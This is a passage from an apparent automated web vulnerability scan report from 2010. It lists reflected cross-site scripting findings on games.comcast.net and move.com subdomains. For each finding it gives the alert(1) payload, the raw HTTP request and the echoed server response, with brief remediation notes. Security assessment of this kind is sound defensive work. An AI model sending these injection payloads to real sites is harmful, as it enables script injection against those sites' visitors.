This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cmf3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:13 GMT
Server: Apache
Set-Cookie: ssid=h0nrl48tg0guhk13n8ltacb3h0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:13 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Set-Cookie: affiliate_code=t_03cmf3063%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6a42dc0ab56; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=889235648.20480.0000; path=/
Content-Length: 29284

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ludia/dip_nt_en/t_03cmf3063"><img src=a onerror=alert(1)>6a42dc0ab56/PressYourLuck.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload e089a</noscript><script>alert(1)</script>951348d9f29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:23 GMT
Server: Apache
Set-Cookie: ssid=sr7vraqja24ch6vd8b0pobha84; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Content-Length: 665
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload eeb6a</noscript><script>alert(1)</script>c4670f56420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache
Set-Cookie: ssid=utmgdutu5fcvcod3ovdibp5s64; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 73e24</noscript><script>alert(1)</script>fec4c25f5cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:26 GMT
Server: Apache
Set-Cookie: ssid=jf8r2ipsolnif7g17h7m327g65; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Content-Length: 615
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames was not found on this server.</p>
...[SNIP]...

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 8bce2</noscript><script>alert(1)</script>5b386e009e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:39 GMT
Server: Apache
Set-Cookie: ssid=s8tpq3a2d6nmt2277sqjgub284; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Content-Length: 621
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames was not found on this server.</p>
...[SNIP]...

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload dc5c1</noscript><script>alert(1)</script>22c38537d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:18 GMT
Server: Apache
Set-Cookie: ssid=bd1con7p94do1s3jm7bhu9gk82; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Content-Length: 629
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:34 GMT
Server: Apache
Set-Cookie: ssid=ii7uo2kh80idg52kfki2hku1b4; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Content-Length: 635
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /Move/Moving/Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de42a</script><script>alert(1)</script>185f2068544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Move/Moving/Default.asp?de42a</script><script>alert(1)</script>185f2068544=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 39615
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A15+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/moving/default.asp@ -->

<html>
<head>
<tit
...[SNIP]...
valid Zip Code');
               form.Zip.focus();    
               isValid = false;
           }        
}
       if (isValid==true){
           form.action = form.action + '&Showzip=' + form.Zip.value +'&' + arrLinks[intMoveType] + '&' + 'de42a</script><script>alert(1)</script>185f2068544=1';
           form.submit();
           if(document.mover.MoveType.value==2)
           isValid=false;        }

       return isValid;
       
   }
   function validateUSZip( strValue ) {
       /******************************************
...[SNIP]...

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6723'-alert(1)-'369fa1d63f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/?d6723'-alert(1)-'369fa1d63f=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:13 GMT
X-Powered-By: ASP.NET
Content-Length: 69841
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A13+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'd6723'-alert(1)-'369fa1d63f=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be453'-alert(1)-'aa41f058865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/default.asp?be453'-alert(1)-'aa41f058865=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 69842
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A14+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'be453'-alert(1)-'aa41f058865=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654a4"><script>alert(1)</script>8b33e015dd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?654a4"><script>alert(1)</script>8b33e015dd7=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=o5vq4czwk254vfmssftqyijg; path=/; HttpOnly
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:19 GMT; path=/
Set-Cookie: Personal333=; expires=Mon, 19-Dec-2011 18:22:19 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang=
...[SNIP]...
gnIn" href="/Login/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4"><script>alert(1)</script>8b33e015dd7=1','//LoginModal/popupwindow-true','PPWINSHOW',333)}, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4">
...[SNIP]...

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e94"><script>alert(1)</script>d77209e2310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-100/city-elgin?94e94"><script>alert(1)</script>d77209e2310=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=4yy01rfbldji5ha32sp5kfjn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 217609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94"><script>alert(1)</script>d77209e2310=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94">
...[SNIP]...

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 98ac7--><script>alert(1)</script>ac0c2d01358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-100/city-elgin?98ac7--><script>alert(1)</script>ac0c2d01358=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=gbod1pi2b0cgqd455h5gppiy; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 216643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7--><script>alert(1)</script>ac0c2d01358=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7-->
...[SNIP]...

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6873e--><script>alert(1)</script>4919b76ff04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-112?6873e--><script>alert(1)</script>4919b76ff04=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=nnyk2umyfj14ar45xxcru245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 192747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e--><script>alert(1)</script>4919b76ff04=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e-->
...[SNIP]...

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb31"><script>alert(1)</script>b122dc6b5fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-112?dfb31"><script>alert(1)</script>b122dc6b5fa=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=cgckrd45hjb4rdupds3tuc45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 181242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
